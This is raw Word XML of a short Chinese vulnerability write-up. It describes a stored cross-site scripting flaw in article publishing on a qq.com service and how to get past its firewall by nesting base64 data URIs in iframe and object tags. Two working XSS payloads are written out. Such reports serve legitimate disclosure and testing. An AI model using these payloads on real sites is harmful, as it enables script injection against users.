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手机端测试发送，web端应该也是一样的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就用app端复现吧</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先正常注册</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2987040" cy="646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写一篇文章，直接发布抓包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们将</w:t>
      </w:r>
      <w:r>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数内容替换成我们绕waf的poc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>&lt;iframe src="data:text/html;base64,PG9iamVjdCBkYXRhPWRhdGE6dGV4dC9odG1sO2Jhc2U2NCxQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDQ9Pjwvb2JqZWN0Pg=="&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0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url: </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://teamvision.qq.com/spread/previewArticle?articleId=8fAhfdFYUlc%3D" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>https://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xxxxxxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>.qq.com/spread/previewArticle?articleId=8fAhfdFYUlc%3D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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1639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绕过思路：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过bypass</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bypass绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是对object进行b</w:t>
      </w:r>
      <w:r>
        <w:t>ase64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>&lt;object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgneXVlcWl1Jyk8L3NjcmlwdD4=&gt;&lt;/object&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后在吧</w:t>
      </w:r>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bject标签转换成b</w:t>
      </w:r>
      <w:r>
        <w:t>ase64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放到</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1440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M2U5NjgwYzBhMzg5MjFlMGI3Y2VhMGVkOTdiYWYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00C174BF"/>
    <w:rsid w:val="00166B92"/>
    <w:rsid w:val="00215BB8"/>
    <w:rsid w:val="0095125F"/>
    <w:rsid w:val="00A77CD2"/>
    <w:rsid w:val="00C174BF"/>
    <w:rsid w:val="00D51CCF"/>
    <w:rsid w:val="00DC590A"/>
    <w:rsid w:val="00F31805"/>
    <w:rsid w:val="77A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478</Characters>
  <Lines>4</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>481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2021-08-23T14:19:00Z</dcterms:created>
  <dc:creator>邓 子鸣</dc:creator>
  <cp:lastModifiedBy>啊！</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-17T11:37:07Z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47B38BBFEA6042A49615204AC801834D</vt:lpwstr>
  </property>
</Properties>
</file>